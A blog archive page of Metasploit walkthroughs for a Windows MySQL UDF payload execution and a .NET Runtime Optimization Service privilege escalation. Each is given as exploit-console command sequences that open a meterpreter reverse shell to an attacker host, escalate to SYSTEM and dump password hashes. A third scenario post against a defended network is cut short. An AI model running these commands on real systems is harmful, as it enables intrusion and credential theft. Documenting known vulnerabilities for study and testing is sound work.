Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Exploits, Metasploit, ,

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file, create routine,alter routine,execute on *.* to test3@’%’ identified by ‘test3’;

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump

EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation

Exploits, Metasploit, ,

Timeline :

Vulnerability disclosed by XenoMuta on Exploit-DB the 2011-03-08
Metasploit PoC provided by David Rude the 2011-03-08

PoC provided by :

XenoMuta
David Rude

Reference(s) :

EDB-ID-16940
OSVDB-71013

Affected version(s) :

Microsoft .NET Framework include 4.0 and 2.0

Tested on Windows XP SP3 with :

With Microsoft.NET Framework v2.0.50727 mscorsvw.exe

Description :

This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. Seem to work on Windows XP SP3, 2003 R2 & 7.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background

use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit

sessions -i 2
getuid
hashdump

Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus

Metasploit, , , , ,

Third scenario of the Metasploit Exploitation Scenarios.

Here, the user is a standard user, protected by 5 countermeasures :

– Firewall rules how limit the outbound connexions only on special ports.
– Transparent HTTP/S Proxy for web surfing.
– Dual antivirus (Avira / Clamav) scanning for web surfing (useless in the case, due to the Astaro bugs).
– Dr.Web Antivirus on the target Windows XP.
– Windows Firewall on the target Windows XP.